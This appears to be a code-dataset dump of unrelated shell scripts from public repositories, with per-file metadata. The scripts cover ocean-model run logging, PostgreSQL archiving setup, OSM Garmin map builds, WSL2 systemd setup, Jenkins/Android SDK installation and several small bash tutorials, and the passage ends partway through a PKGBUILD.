# ln_limdmp=$(LookInNamelist ln_limdmp namelist_ice )
# nit000=$(LookInNamelist nn_it000 namelist_oce.10 )
# If there is a third argument it is used as a namelist block and the search is
# limited to this block :
# ln_tsd_init=$(LookInNamelist ln_tsd_init namelist_cfg namtsd_drk )
LookInNamelist() {
if [ $# -ge 2 ] ; then znamelist=$2 ; else znamelist=namelist ; fi
if [ $# = 3 ] ; then zblk=$3 ; else zblk='' ; fi
if [ ! $zblk ] ; then
eval grep -e $1 $znamelist | tr -d \' | tr -d \" | sed -e 's/=/ = /' | awk ' {if ( $1 == str ) print $3 }' str=$1
else
getblock $zblk $znamelist | eval grep -e $1 | tr -d \' | tr -d \" | sed -e 's/=/ = /' | awk ' {if ( $1 == str ) print $3 }' str=$1
fi
}
# Get a namelist block from its name in namelist
getblock() {
# if a 2nd argument is passed, it is a namelist name. Default to 'namelist'
if [ $2 ] ; then namelist=$2 ; else namelist=namelist ; fi
cat $namelist | awk 'BEGIN {flip=0} { \
if ( $1 == "&"blk && flip == 0 ) { flip=1 } \
if ( $1 != "/" && flip == 1 ) { print $0 } \
if ( $1 == "/" && flip == 1 ) { print $0 ; flip=0 } \
}' blk=$1
}
# For logical value in namelist always return T or F despite the namelist format ( TRUE,true, true etc ...)
normalize() {
tmp=$(echo $1 | tr 'a-z' 'A-Z' )
echo $tmp | grep -q 'T'
if [ $? = 0 ] ; then echo T ; else echo F ; fi
}
# ---
name=nemo_occigen
force=''
CONFCASE='eORCA12.L75-GJM2020'
user=$USER
filout=journal.md
MACHINE=$(hostname)
case $MACHINE in
( irene* ) MACHINE=irene ;;
( occigen* ) MACHINE=occigen ;;
( ada* ) MACHINE=ada ;;
( login*occigen) MACHINE=occigen2 ;;
( jean-zay*) MACHINE=jean-zay ;;
esac
name=nemo_$MACHINE
while getopts :hfn:c:o: opt ; do
case $opt in
(h) usage ;;
(n) name=${OPTARG} ;;
(c) CONFCASE=${OPTARG} ;;
(o) filout=${OPTARG} ;;
(*) usage ;;
esac
done
tmp=$(pwd)
CONFIG=${CONFCASE%-*}
CASE=${CONFCASE#*-}
echo $CONFCASE
echo $user
echo $filout
echo $name
echo "# Journal of $CONFCASE run"
line Date Seg jobid Nem/Xio start/end nit000/nitend rdt comment
header c r r c c r r n
for f in $( ls -t $name.e* ) ; do
ofile=$(echo $f | sed -e 's/\.e/.o/' )
jobid=$(getjobid $f)
seg=$( grep 'no=' $f | awk -F= '{print $2}' )
# corresponding namelist_oce
namelist=$WORK/${CONFIG}/${CONFCASE}-S/ANNEX/namelist_oce.$seg
# namelist=../namelist.$CONFCASE
# corresponding ocean.output file
oceanout=$WORK/${CONFIG}/${CONFCASE}-S/ANNEX/ocean.output.$seg
# date of segment
nday=$(cat $ofile | grep starting | awk '{print $2}' )
t1=$(cat $ofile | grep starting | awk '{print $7}' )
t2=$( datfinyyyy $t1 $nday )
t1=$(reformdat $t1)
t2=$(reformdat $t2)
nit000=$( cat $f | grep 'nit000=' | head -1 | awk -F= '{print $2}')
nitend=$( cat $f | grep 'nitend=' | head -1 | awk -F= '{print $2}')
# time step as read from ofile
rn_rdt=$( cat $ofile | grep 'Time step is' | awk -F: '{print $2}')
# flag linssh
tmp=$( LookInNamelist ln_linssh $namelist ) ; tmp=$(normalize $tmp)
if [ $tmp = T ] ; then
comment='linssh'
else
comment='.'
fi
# nproc NEMO/XIOS
nb_proc_nemo=$(grep -w NB_NPROC $f | tail -1 | awk -F= '{print $2}' )
nb_proc_xios=$(grep -w NB_NPROC_IOS $f | tail -1 | awk -F= '{print $2}' )
# Execution date
fecha=$(head -2 $ofile | tail -1 | sed -e 's/CEST//')
linedat ${fecha[@]:4}
line $seg $jobid $nb_proc_nemo'/'$nb_proc_xios $t1'/'$t2 $nit000'/'$nitend $rn_rdt $comment
done
| true
|
3e86f8c393814af59dc1750f1535aa642fd1cda7
|
Shell
|
erdenayates/bash-scripting-examples
|
/for.sh
|
UTF-8
| 84
| 2.609375
| 3
|
[] |
no_license
|
#! /bin/bash
for x in 1 2 3 4 #that can be {1..4..1} also.
do
echo $SHELL
done
| true
|
562b36a125c57998b939d7708d3e9e9611058a96
|
Shell
|
metmirr/shell-examples
|
/24-trap.sh
|
UTF-8
| 681
| 3.53125
| 4
|
[] |
no_license
|
echo "
#############################################
## Example 24.1: #
## trap signals that run on EXIT and Ctrl+C #
#############################################
"
trap "echo we\'re exiting the script!" EXIT
trap "echo you pressed Ctrl+C" INT
echo 'press Ctrl+C here to see the INT signal handler run.'
# notice that Ctrl+C doesn't actually make the script exit, like it usually
# would! This is because trap replaces the normal signal handler for Ctrl+C
# (which would cause the script to exit). If you put an `; exit` at the end of
# the signal handler command, it'll exit the script
# this `read` just gives an opportunity to press Ctrl+C
read
| true
|
5383100794b33b3081fdb58d555bda1214924dcd
|
Shell
|
Bhaskarsjb/cookbooks
|
/postgresql_test/files/default/postgresql_archiving.sh
|
UTF-8
| 4,504
| 3.65625
| 4
|
[] |
no_license
|
#!/bin/sh
#! /bin/bash
#set -x
#SCRIPT SHOULD BE RUN AS ROOT USER.
sudo clear
if [[ $# -lt 5 ]] ; then
echo " Usage: $0 #1 #2 #3 #4 #5 "
echo " wal_level : $1 "
echo " max_wal_size : $2 "
echo " wal_keep_segments : $3 "
echo " archive_mode : $4 "
echo " archive_command : S5 "
echo " archive_timeout : S6 "
echo "USAGE:- ./postgrearchive.sh archive 1GB 10 on "cp %p /var/lib/postgresql/10.1/archive/%f" 1h"
exit 0
fi
wal_level=$1
max_wal_size=$2
wal_keep_segments=$3
archive_mode=$4
archive_command=$5
archive_timeout=$6
sleep 5s
echo "Write Ahead Log Archive Parameters......."
echo""
echo "########################################################"
echo " wal_level : $wal_level "
echo " max_wal_size : $max_wal_size "
echo " wal_keep_segments : $wal_keep_segments "
echo " "
echo " archive_mode : $archive_mode "
echo " archive_command : $archive_command "
echo " archive_timeout : $archive_timeout "
echo "########################################################"
echo ""
sleep 2s
echo "Fetch Binary path location"
directory=$(ps ax -o pid,cmd | grep 'postgres *-D' | awk '{ print $2 }')
bindirectory=$(dirname $directory)
echo "Binary directory path of postgresql is $bindirectory"
echo "Fetching Data Directory Locaiton"
data="$($bindirectory/psql -q -U postgres -t -P format=unaligned -c 'show data_directory;')"
echo "Postgre Data Directory : $data "
echo""
config="$($bindirectory/psql -q -U postgres -t -P format=unaligned -c 'show config_file;')"
echo "Postgres configuration file path : $config"
echo "backup postgresql.config file to \root\ "
cp $config \root\postgresql.config.bak
echo ""
echo ""
echo " ###########Updating Postgresql.conf########### "
echo""
sleep 5s
echo""
sed -i -e "/#wal_level = minimal/s/minimal/$wal_level/" "$config"
sed -i -e "/#wal_level/s/#/ /" "$config"
echo "wal_level updated..."
echo""
echo""
sed -i -e "/#wal_keep_segments = 0/s/0/$wal_keep_segments/" "$config"
sed -i -e "/#wal_keep_segments/s/#/ /" "$config"
echo "wal_keep_segments updated..."
echo""
echo""
sed -i -e "/#max_wal_size = 1GB/s/1GB/$max_wal_size/" "$config"
sed -i -e "/#max_wal_size/s/#/ /" "$config"
echo "max_wal_size updated..."
echo""
echo""
sed -i -e "/#archive_mode = off/s/off/$archive_mode/" "$config"
sed -i -e "/#archive_mode/s/#/ /" "$config"
echo "archive_mode updated..."
echo""
echo""
#sed -i -e "/#archive_command = ''/s/''/'$archive_command'/" "$config"
#sed -i -e "/#archive_command/s/#/ /" "$config"
sed -i -e "s|#archive_command = ''|archive_command = '$archive_command '|" "$config"
echo "archive_command updated..."
echo""
echo""
sed -i -e "/#archive_timeout = 0/s/0/$archive_timeout/" "$config"
sed -i -e "/#archive_timeout/s/#/ /" "$config"
echo " Archive_timeout updated..."
echo""
echo""
echo " #####Configuration file Update completed###### "
echo""
echo""
echo "Restarting postgres Database services..."
su - postgres <<eof
$bindirectory/pg_ctl -D $data restart
if [ $? != 0 ]
then
echo "Postgres service restart failed.. please validate the logfile..."
else
echo "Postgres service restarted successfully...please validate the logfile for more information..."
exit 0
fi
eof
sleep 15s
echo "####Archive Configuration details#### "
wallevel="$($bindirectory/psql -q -U postgres -t -P format=unaligned -c 'show wal_level;')"
walkeepsegments="$($bindirectory/psql -q -U postgres -t -P format=unaligned -c 'show wal_keep_segments;')"
maxwalsize="$($bindirectory/psql -q -U postgres -t -P format=unaligned -c 'show max_wal_size;')"
archivemode="$($bindirectory/psql -q -U postgres -t -P format=unaligned -c 'show archive_mode;')"
archivecommand="$($bindirectory/psql -q -U postgres -t -P format=unaligned -c 'show archive_command;')"
archivetimeout="$($bindirectory/psql -q -U postgres -t -P format=unaligned -c 'show archive_timeout;')"
echo " New Wal_level : $wallevel "
echo " New wal_keep_segments : $walkeepsegments "
echo " New Archive_mode : $archivemode "
echo " New Archive_timeout : $archivetimeout "
echo " New Archive_command : $archivecommand "
exit 0
| true
|
cd3adba12c907792f3acdc76b6302ef54ac944f3
|
Shell
|
schadow1/osmphgps
|
/build/build_script.sh
|
UTF-8
| 3,118
| 3.09375
| 3
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
#! /bin/sh -x
############################################################################
#
# MODULE: osmphgarmin map build script
#
# AUTHOR(S): Ervin Malicdem schadow1@s1expeditions.com
# Emmanuel Sambale esambale@yahoo.com emmanuel.sambale@gmail.com
#
# PURPOSE: Shell script for creating Garmin maps from OSM data.
# Requires mkgmap, gmapi-builder python script, nsis.
#
# This program is free software under the GNU General Public
# License (>=v2).
#
#############################################################################
#Set these directory paths
download_dir=------
output_dir=------
split_dir=------
download_link=---
download_link_osmconvert=---
download_link_osmfilter=---
#Nothing to change below
#===========
cd ${download_dir}
# Download from geofabrik site
wget -c ${download_link}
ls -al
# Download OSMConvert
wget -O ${download_link_osmconvert}
ls -al
# Download OSMFilter
wget -O ${download_link_osmfilter}
ls -al
#Convert OSM file to boundary file
osmconvert philippines-latest.osm.pbf --out-o5m >philippines.o5m
#Extract boundaries data
osmfilter philippines.o5m --keep-nodes= --keep-ways-relations="boundary=administrative =postal_code postal_code=" --out-o5m > philippines-boundaries.o5m
#Export boundaries data
java -cp mkgmap.jar uk.me.parabola.mkgmap.reader.osm.boundary.BoundaryPreprocessor philippines-boundaries.o5m boundary
# Split the file using splitter.jar
java -jar splitter.jar --max-nodes=1000000 --keep-complete=true philippines.osm.pbf --output-dir=${split_dir}
ls -al
# compile map with logging properties report
#time java -Dlog.config=logging.properties -Xmx2012m -jar mkgmap.jar --read-config=args.list ${output_dir}
time java -Xmx2012m -jar mkgmap.jar --read-config=args.list --series-name="OSM Philippines $(date +%Y%m%d)" --description="OSM Philippines $(date +%Y%m%d)" --output-dir=${output_dir} ~/osm/routable_garmin/dev/split/*.osm.pbf
# gmapsupp.img generation
time java -Xmx2012m -jar mkgmap.jar --read-config=args2.list ~/osm/routable_garmin/dev/split/*.osm.pbf ~/osm/routable_garmin/dev/SCHADOW.TYP
ls -al
zip osmph_img_latest_dev.zip gmapsupp.img
# Gmapi for Mac Roadtrip installer
python gmapi-builder -t ${output_dir}/40000001.tdb -b ${output_dir}/40000001.img -s ${output_dir}/SCHADOW.TYP -i ${output_dir}/40000001.mdx -m ${output_dir}/40000001_mdr.img ${output_dir}/*.img
ls -al
zip -r osmph_macroadtrip_latest_dev.zip "OSM Philippines $(date +%Y%m%d).gmapi"
#mv osmph_macroadtrip_latest_dev.zip /home/maning/osm/routable_garmin/dev/
rm -rf "OSM Philippines $(date +%Y%m%d).gmapi"
cd ${output_dir}
ls -al
# Win Mapsource installer
makensis osmph_mapsource_installer_.nsi
mv osmph_winmapsource_latest_.exe /home/maning/osm/routable_garmin/dev/osmph_winmapsource_latest_dev.exe
#temporary mv
#mv osmph_winmapsource_latest_.exe /home/maning/Downloads/osm/routable_garmin/data/
rm *.img
rm *.mdx
rm *.tdb
cd ..
rm *.img
rm *.tdb
rm *.mdx
date > log.txt
#Miscellaneous
cd ${download_dir}
# upload to server
# archiving downloaded philippine osm file
mv philippines.osm.pbf archive/philippines_$(date +%Y%m%d).osm.pbf
| true
|
07ae8cbf9b1591a18d09b15fd3d23779700cb378
|
Shell
|
hoangtran/dotfiles
|
/bin/sshot
|
UTF-8
| 486
| 4
| 4
|
[] |
no_license
|
#!/bin/bash
#
# a general scrot wrapper script
#
###
message() { echo 'usage: sshot [ -n <name> ] [ -f ] [ scrot options ]'; exit 1; }
shots_dir='~/pictures/screenshots'
name="desktop_$(date +%y%m%d%H%M)"
# grab some options for us, pass anything
# else directly to scrot
while [ -n "$1" ]; do
case $1 in
-h|--help) message ;;
-n|--name) shift; name="$1" ;;
*) ;;
esac
shift
done
shot="$shots_dir/${name// /_}.png"
scrot "$shot" || exit 1
| true
|
88ef977e2a3a114491308c46e5cdb318e9bdf234
|
Shell
|
upsales/upsales-node-integration-template
|
/setup.sh
|
UTF-8
| 887
| 3.625
| 4
|
[
"MIT"
] |
permissive
|
read -p "Name of integration: " name
echo "Copying files"
cd ..
cp -r upsales-node-integration-template $name
cd $name
sed -i "" "s/upsales-node-integration-template/$name/g" package.json
echo "# $name
_Short description what the integration does_
## Where is it?
_Where is it running_
_What endpoint does it listen to_
_Are there different deployments for beta/prod_
_Where are the logs_
## How to deploy?
_Any special deployment or set-up steps_
## Environment variables
_Which environment variables are there on what do they do_
## What are the different endpoints used for?
_Short description about the different endpoints, what does it listen do and why?_
## Dev environment
_How to run the integration on a dev environment_
" > README.md
echo "Initiating git"
rm -rf .git
git init
echo "Installing dependencies"
npm install
echo "Setup done! Integration available at $PWD"
| true
|
f9115ec9223d0c20c0640667b3ff267941509a5a
|
Shell
|
wenusch/casinocoin-webhook-server
|
/entrypoint
|
UTF-8
| 289
| 2.734375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
cd /usr/src/app
if [[ ! -e /installed ]]; then
touch /installed
echo "Not installed yet, run init scripts"
echo "Database (ecto) create & migrate"
mix ecto.create && mix ecto.migrate
echo "Run tests"
mix test
fi
exec mix phx.server "$@"
| true
|
fffb342b6690fa3451a9d939669560f75aaf2978
|
Shell
|
reetp/rocket-chat-rest-client
|
/curlTest.sh
|
UTF-8
| 665
| 2.875
| 3
|
[] |
no_license
|
#!/bin/bash
MSG="${1:-test msg}"
CHANNEL="${2:-test-readonly}"
USERNAME="user_b"
PASSWORD="password"
SERVER="https://testrocket"
USERID="userid_of_user_b"
# GET authToken
AUTHTOKEN="$(curl -s ${SERVER}/api/v1/login -d "username=${USERNAME}&password=${PASSWORD}" | grep "authToken" | cut -d"\"" -f4)"
# post message
curl -s -H "X-Auth-Token: ${AUTHTOKEN}" \
-H "X-User-Id: ${USERID}" \
-H "Content-type:application/json" \
${SERVER}/api/v1/chat.postMessage \
-d '{"channel": "#'${CHANNEL}'", "text": "'"${MSG}"'"}'
# logout
curl -s -H "X-Auth-Token: ${AUTHTOKEN}" \
-H "X-User-Id: ${USERID}" ${SERVER}/api/v1/logout
| true
|
6032b86d6a29492b86c2acbc903f2841368a48b0
|
Shell
|
RasppleII/rasppleii-history
|
/website_2015-10/a2cloud/setup/a2chat.txt
|
UTF-8
| 1,256
| 3.75
| 4
|
[] |
no_license
|
#!/bin/bash
if [[ ! $(dpkg -l irssi 2> /dev/null | grep '^ii') ]]; then
echo "Installing irssi..."
supo apt-get -y update
sudo apt-get -y install irssi &> /dev/null
sudo apt-get -y clean
fi
if [[ $1 == "-n" && $2 ]]; then
nickname=$2
elif [[ $1 == "-n" ]]; then
nickname="0"
elif [[ -f ~/.irssi/a2c.nickname ]]; then
nickname=$(cat ~/.irssi/a2c.nickname)
else
nickname=
fi
while [[ ! $nickname || ! $(grep -i '^[a-z_\-\\^{}|`][a-z0-9_\-\\^{}|`]*$' <<< $nickname) ]]; do
echo -n "Enter a nickname for chat (to change later, use 'a2chat -n'): "
read
nickname=$REPLY
done
mkdir -p ~/.irssi
echo $nickname > ~/.irssi/a2c.nickname
if [[ -f ~/.irssi/startup ]]; then
mv ~/.irssi/startup ~/.irssi/startup.orig
fi
echo -e "/network add -autosendcmd '/join #a2c.chat' Palomino.A2\n/server add -auto -network Palomino.A2 irc.a2central.com\n" > ~/.irssi/startup
if [[ -f ~/.irssi/config ]]; then
cp ~/.irssi/config ~/.irssi/config.orig
fi
irssi -n $nickname
rm ~/.irssi/startup &> /dev/null
if [[ -f ~/.irssi/startup.orig ]]; then
mv ~/.irssi/startup.orig ~/.irssi/startup
fi
rm ~/.irssi/config &> /dev/null
if [[ -f ~/.irssi/config.orig ]]; then
mv ~/.irssi/config.orig ~/.irssi/config
fi
| true
|
fbf78532fa26e1f8c4e918ecd82ada914d252c6c
|
Shell
|
hdc1112/misc-program
|
/java/Eclipse-workspace/MR-2Phase-FPGrowth/cluster-scripts/cluster-runscript/cli-version/data.sh
|
UTF-8
| 1,518
| 3.609375
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# default value stage
folder= #f
noupload= #n
worknode=ibmvm1 #w
user=dachuan #u
# definition, parsing, interrogation stages
while getopts ":f:w:u:n" o; do
case $o in
f)
folder=$OPTARG
;;
w)
worknode=$OPTARG
;;
u)
user=$OPTARG
;;
n)
noupload=noupload
;;
*)
echo invalid argument >&2
exit 1
;;
esac
done
# arguments show stage
echo `basename $0` arguments list
echo folder=$folder
echo noupload=$noupload
echo worknode=$worknode
echo user=$user
#verify arguments stage (skip)
# standard header
absme=`readlink -f $0`
abshere=`dirname $absme`
# argument path absolutify
folder=`readlink -f $folder`
foldername=`basename $folder`
# enter my work directory
cd $abshere
# main logic
set -x
ssh -n $user@$worknode /home/$user/hadoop-2.2.0/bin/hdfs dfs -rm -r -f /output-test-1stphase /output-test
if [ "$noupload" = "noupload" ]; then
echo Data upload is skipped, user assumes the input is ready in HDFS
else
ssh -n $user@$worknode "rm -rf /tmp/${foldername}dif && mkdir /tmp/${foldername}dif"
echo start uploading data to hdfs && date
scp -r $folder/* $user@$worknode:/tmp/${foldername}dif/
echo data uploaded to hdfs && date
ssh -n $user@$worknode ./hadoop-2.2.0/bin/hdfs dfs -rm -r -f /input-test
ssh -n $user@$worknode ./hadoop-2.2.0/bin/hdfs dfs -mkdir /input-test
ssh -n $user@$worknode ./hadoop-2.2.0/bin/hdfs dfs -copyFromLocal /tmp/${foldername}dif/* /input-test/
fi
set +x
| true
|
801a8349ee83dae6d021604412dbd3831bb59a24
|
Shell
|
jackylk/public
|
/apps/mlr/scripts/run_mlr.sh
|
UTF-8
| 3,372
| 3.0625
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/usr/bin/env bash
# Covtype
train_file="covtype.scale.train.small"
test_file="covtype.scale.test.small"
train_file_path=$(readlink -f datasets/$train_file)
test_file_path=$(readlink -f datasets/$test_file)
global_data=true
perform_test=true
# Init weights
use_weight_file=false
weight_file=
# Data parameters:
num_train_data=0 # 0 to use all training data.
# Execution parameters:
num_epochs=40
num_batches_per_epoch=300
learning_rate=0.01
decay_rate=0.95
num_batches_per_eval=300
num_train_eval=10000 # large number to use all data.
num_test_eval=20
# System parameters:
host_filename="scripts/localserver"
num_app_threads=4
staleness=0
loss_table_staleness=0
num_comm_channels_per_client=1
# Figure out the paths.
script_path=`readlink -f $0`
script_dir=`dirname $script_path`
app_dir=`dirname $script_dir`
progname=mlr_main
prog_path=$app_dir/bin/${progname}
host_file=$(readlink -f $host_filename)
ssh_options="-oStrictHostKeyChecking=no \
-oUserKnownHostsFile=/dev/null \
-oLogLevel=quiet"
# Parse hostfile
host_list=`cat $host_file | awk '{ print $2 }'`
unique_host_list=`cat $host_file | awk '{ print $2 }' | uniq`
num_unique_hosts=`cat $host_file | awk '{ print $2 }' | uniq | wc -l`
output_dir=$app_dir/output
output_dir="${output_dir}/mlr.${train_file}.S${staleness}.E${num_epochs}"
output_dir="${output_dir}.M${num_unique_hosts}"
output_dir="${output_dir}.T${num_app_threads}"
output_file_prefix=$output_dir/mlr_out # prefix for program outputs
rm -rf ${output_dir}
mkdir -p ${output_dir}
output_file_prefix=${output_dir}/mlr_out # Prefix for program output files.
# Kill previous instances of this program
echo "Killing previous instances of '$progname' on servers, please wait..."
for ip in $unique_host_list; do
ssh $ssh_options $ip \
killall -q $progname
done
echo "All done!"
# Spawn program instances
client_id=0
for ip in $unique_host_list; do
echo Running client $client_id on $ip
cmd="GLOG_logtostderr=true \
GLOG_v=-1 \
GLOG_minloglevel=0 \
GLOG_vmodule="" \
$prog_path \
--hostfile=$host_file \
--client_id=${client_id} \
--num_clients=$num_unique_hosts \
--num_app_threads=$num_app_threads \
--staleness=$staleness \
--loss_table_staleness=$loss_table_staleness \
--num_comm_channels_per_client=$num_comm_channels_per_client \
--num_train_data=$num_train_data \
--train_file=$train_file_path \
--global_data=$global_data \
--test_file=$test_file_path \
--num_train_eval=$num_train_eval \
--num_test_eval=$num_test_eval \
--perform_test=$perform_test \
--num_epochs=$num_epochs \
--num_batches_per_epoch=$num_batches_per_epoch \
--learning_rate=$learning_rate \
--decay_rate=$decay_rate \
--num_batches_per_eval=$num_batches_per_eval
--stats_path=${output_dir}/mlr_stats.yaml \
--use_weight_file=$use_weight_file \
--weight_file=$weight_file \
--sparse_weight=false \
--output_file_prefix=$output_file_prefix"
ssh $ssh_options $ip $cmd &
#eval $cmd # Use this to run locally (on one machine).
# Wait a few seconds for the name node (client 0) to set up
if [ $client_id -eq 0 ]; then
echo $cmd # echo the cmd for just the first machine.
echo "Waiting for name node to set up..."
sleep 3
fi
client_id=$(( client_id+1 ))
done
| true
|
2f766b1f1046a97c7b7c1d42a7776694e2c93a19
|
Shell
|
patrick330602/minimal-wsl2-systemd-script
|
/install.sh
|
UTF-8
| 2,260
| 3
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
if [ "$EUID" -ne 0 ]
then echo "Please run as root"
exit
fi
tmp_dir=$(mktemp -d)
cd $tmp_dir
git clone https://github.com/diddledan/one-script-wsl2-systemd
python3 -c "import configparser; config = configparser.ConfigParser(); config.read('/etc/wsl.conf'); config['boot']['command'] = \"/usr/bin/env -i /usr/bin/unshare --fork --mount-proc --pid -- sh -c 'mount -t binfmt_misc binfmt_misc /proc/sys/fs/binfmt_misc; [ -x /usr/lib/systemd/systemd ] && exec /usr/lib/systemd/systemd --unit=multi-user.target || exec /lib/systemd/systemd'\"; x = open('/etc/wsl.conf', 'w'); config.write(x); x.close();"
cp one-script-wsl2-systemd/src/sudoers /etc/sudoers.d/wsl2-systemd
cp one-script-wsl2-systemd/src/00-wsl2-systemd.sh /etc/profile.d/00-wsl2-systemd.sh
mkdir -p "/etc/systemd/system/user-runtime-dir@.service.d/"
cp one-script-wsl2-systemd/src/systemd/user-runtime-dir.override "/etc/systemd/system/user-runtime-dir@.service.d/override.conf"
cp one-script-wsl2-systemd/src/systemd/wsl2-xwayland.service /etc/systemd/system/wsl2-xwayland.service
cp one-script-wsl2-systemd/src/systemd/wsl2-xwayland.socket /etc/systemd/system/wsl2-xwayland.socket
ln -sf /etc/systemd/system/wsl2-xwayland.socket /etc/systemd/system/sockets.target.wants/
ln -sf /dev/null /etc/systemd/user/dirmngr.service
ln -sf /dev/null /etc/systemd/user/dirmngr.socket
ln -sf /dev/null /etc/systemd/user/gpg-agent.service
ln -sf /dev/null /etc/systemd/user/gpg-agent.socket
ln -sf /dev/null /etc/systemd/user/gpg-agent-ssh.socket
ln -sf /dev/null /etc/systemd/user/gpg-agent-extra.socket
ln -sf /dev/null /etc/systemd/user/gpg-agent-browser.socket
ln -sf /dev/null /etc/systemd/user/ssh-agent.service
ln -sf /dev/null /etc/systemd/user/pulseaudio.service
ln -sf /dev/null /etc/systemd/user/pulseaudio.socket
ln -sf /dev/null /etc/systemd/system/ModemManager.service
ln -sf /dev/null /etc/systemd/system/NetworkManager.service
ln -sf /dev/null /etc/systemd/system/NetworkManager-wait-online.service
ln -sf /dev/null /etc/systemd/system/networkd-dispatcher.service
ln -sf /dev/null /etc/systemd/system/systemd-networkd.service
ln -sf /dev/null /etc/systemd/system/systemd-networkd-wait-online.service
ln -sf /dev/null /etc/systemd/system/systemd-resolved.service
rm -rf $tmp_dir
| true
|
0bcd5f8a401825ebdef4bc23f11645c1c200fd68
|
Shell
|
aur-archive/deutex
|
/PKGBUILD
|
UTF-8
| 587
| 2.578125
| 3
|
[] |
no_license
|
# Contributor: rabyte <rabyte.at.pen.dot.tj>
pkgname=deutex
pkgver=4.4.0
pkgrel=4
pkgdesc="A WAD file composer for Doom, Heretic, Hexen and Strife"
arch=('i686')
url="http://www.teaser.fr/~amajorel/deutex/"
license=('custom')
source=(http://www.teaser.fr/~amajorel/$pkgname/$pkgname-$pkgver.tar.gz)
md5sums=('4c4ea0ff9eae76165a3756b756d71a16')
build() {
cd $startdir/src/$pkgname-$pkgver
make CFLAGS="${CFLAGS} -Wall" || return 1
mkdir -p $startdir/pkg/usr/{bin,man/man6}
make PREFIX=$startdir/pkg/usr install
install -m644 -D LICENSE $startdir/pkg/usr/share/licenses/$pkgname/LICENSE
}
| true
|
ab16568190e2d448e575f21eabaeec9f4bd521ba
|
Shell
|
BigNerd95/Grandstream-Firmware-HT802
|
/FirmwareDumps/HT802-1.0.0.24/etc/rc.d/init.d/rcM
|
UTF-8
| 754
| 3.609375
| 4
|
[] |
no_license
|
#!/bin/sh
signal_exit()
{
#send signal that we are done
scripts_signal 0
if [ -n "$1" ]; then
exit $1
else
exit 0
fi
}
if [ $# -lt 1 ]; then
signal_exit 1
fi
CMD="$(echo $*|tr -s ' ')"
while [ -n "$CMD" ]
do
SCRIPT="$(echo $CMD|cut -d' ' -f1)"
case "$SCRIPT" in
1)
/etc/init.d/cron
;;
2)
/etc/init.d/telnet
;;
3)
/etc/init.d/syslog restart
;;
4)
/etc/init.d/reload_gs_ata
;;
5)
/etc/init.d/apply_country_profile reload
/etc/init.d/reload_gs_ata
;;
esac
PREVCMD="$CMD"
CMD="$(echo $CMD|cut -d' ' -f2-)"
if [ "$PREVCMD" = "$CMD" ]; then
break
fi
done
signal_exit 0
| true
|
8e6c73eb3c56be94c6460ff9d49b404798a15801
|
Shell
|
guudwu1986/settings
|
/script/gitconfig.sh
|
UTF-8
| 390
| 3.65625
| 4
|
[] |
no_license
|
#!/bin/bash
if [ ! -d "backup" ]
then
echo 'Backup directory must exist.'
exit 255
fi
current_time=$(date +%Y%m%d-%H%M%S)
if [ -f $HOME"/.gitconfig" ]
then
echo 'Existing file moved to backup directory.'
mv $HOME"/.gitconfig" backup/gitconfig-$current_time
fi
if [ -f "gitconfig" ]
then
ln -s $PWD/gitconfig $HOME/.gitconfig
else
echo 'No template file.'
exit 1
fi
exit 0
| true
|
2de1d33caf0f442c62d81c60a6ba94a2532e949a
|
Shell
|
quiverteam/quiver-runtime
|
/fix_links.sh
|
UTF-8
| 362
| 3.9375
| 4
|
[] |
no_license
|
#!/bin/bash
NAMES="quiver-runtime-i386 quiver-runtime-amd64"
for NAME in $NAMES; do
[ -d $NAME ] || continue;
# Fixup all the symlinks
FILES=$(find ./$NAME -type l)
for file in $FILES; do
# Check if the link is borked
if [ ! -e "$file" ]; then
old=$(readlink $file)
ln -sfn $PWD/$NAME/$old $file
echo "Fixed link $file"
fi
done
done
| true
|
1ef309fc96f0edb2b7c849b55edf0d037fb89904
|
Shell
|
jack141799/jenkins
|
/docker/bash/backup-to-hosting.sh
|
UTF-8
| 577
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
# Backup Nginx
\cp -fr /etc/php.ini /home/config/php.ini
\cp -fr /etc/nginx/nginx.conf /home/config/nginx/nginx.conf
\cp -fr /etc/nginx/sites-include/* /home/config/nginx/sites-include/
\cp -fr /etc/nginx/sites-enabled/* /home/config/nginx/sites-enabled/
# Backup supervisor
\cp -fr /etc/supervisord.conf /home/config/supervisord.conf
# Backup SSH
if [ -f "/root/.ssh/id_rsa.pub" ]; then
\cp -fr /root/.ssh/id_rsa.pub /home/config/ssh-key/
fi
if [ -f "/root/.ssh/id_rsa" ]; then
\cp -fr /root/.ssh/id_rsa /home/config/ssh-key/
fi
echo "Backup Finish"
| true
|
7337078495b90e3eeb7bc8107402730352d83371
|
Shell
|
viplezer/jenkins-install-scripts
|
/install_jenkins-nopretty.sh
|
UTF-8
| 967
| 2.78125
| 3
|
[] |
no_license
|
wget -q -O - https://jenkins-ci.org/debian/jenkins-ci.org.key | sudo apt-key add - && \
sudo sh -c 'echo deb http://pkg.jenkins-ci.org/debian binary/ > /etc/apt/sources.list.d/jenkins.list' && \
sudo apt-get update && \
sudo apt-get -y install openjdk-7-jdk maven libc6-i386 lib32stdc++6 lib32gcc1 lib32ncurses5 lib32z1 jenkins && \
sudo wget http://dl.google.com/android/android-sdk_r24.4.1-linux.tgz -P /opt && \
sudo tar xzvf /opt/android-sdk_r24.4.1-linux.tgz -C /opt && \
sudo rm /opt/android-sdk_r24.4.1-linux.tgz && \
sudo chmod -R +x /opt/android-sdk-linux && \
echo 'export ANDROID_HOME="/opt/android-sdk-linux" export PATH="$ANDROID_HOME/tools:$ANDROID_HOME/platform-tools:$PATH"' | sudo tee /etc/profile.d/android.sh > /dev/null && \
source /etc/profile && \
echo "" && \
echo "Everything is installed, but you have to install Android SDK platforms manually." && \
echo "Use the sudo /opt/android-sdk-linux/tools/android command to start the SDK manager!"
| true
|
47fe2c0274057a80a96b97d3ed0547f366edb8ad
|
Shell
|
behdad/MINGW-packages
|
/mingw-w64-python-nose/PKGBUILD
|
UTF-8
| 2,433
| 2.953125
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
# Maintainer: Alexey Pavlov <alexpux@gmail.com>
_realname=nose
pkgname=("${MINGW_PACKAGE_PREFIX}-python2-${_realname}" "${MINGW_PACKAGE_PREFIX}-python3-${_realname}")
pkgver=1.3.3
pkgrel=1
pkgdesc="A discovery-based unittest extension (mingw-w64)"
arch=('any')
